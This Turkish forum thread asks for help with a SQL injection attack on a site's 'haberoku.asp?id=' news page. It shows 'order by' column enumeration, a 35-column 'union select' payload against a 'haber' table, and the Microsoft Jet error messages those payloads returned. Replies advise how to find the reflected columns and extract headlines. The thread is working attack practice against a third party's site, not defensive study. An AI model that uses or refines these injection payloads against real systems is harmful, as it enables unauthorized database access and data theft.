Sql Yardım

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    YasamaK
    YasamaK's avatar
    Banlanmış Üye
    Erkek

siten.com/haberoku.asp?id=5704+order+by+34   buraya kadar hatayı aldım kolon saysı 34 sanırım 35 de normal site görüntüsü aliyorum

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize '34' as a valid field name or expression.

/haberoku.asp, line 16

siten.com/haberoku.asp?id=5704+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+haber

böyle yapdım bu hata geldi

nasıl gitmeliyim yada yanlışım ne olabilir

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.

/haberoku.asp, line 16

SEVİŞİRKEN EN ZEVKLİ OLAN ŞEY.. tamam, dikkatinizi çektim. ne kadar meraklısınız böyle şeylere terbiyesizliğin lüzumu yok yani :D (, sessizce öldürüyor.)
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Erkek

35 de normal site görüntüsüne ulaşmışsan site üzerinde rakamlar çıkacaktır bazen gözükmeyebilir de ( bir resim içindede çıkmış olabilir )

Neyse ondan sonra haberler tablosundan en fazla başlik vs yazarak haberlere ait başlıkları alabilirsin ama haberler bölümünden siteyi hacklemen sıfır ihtimal gibi bişe

Part Time Engineer, Full Time Dreamer ..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    YasamaK
    YasamaK's avatar
    Banlanmış Üye
    Erkek

hmm anladım kesin çözüm nasıl yapabilirim

SEVİŞİRKEN EN ZEVKLİ OLAN ŞEY.. tamam, dikkatinizi çektim. ne kadar meraklısınız böyle şeylere terbiyesizliğin lüzumu yok yani :D (, sessizce öldürüyor.)
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Realist
    Realist's avatar
    Erkek

haber tablosundan bişey çıkmaz boşuna kasma hacı

..
Toplam Hit: 1028 Toplam Mesaj: 4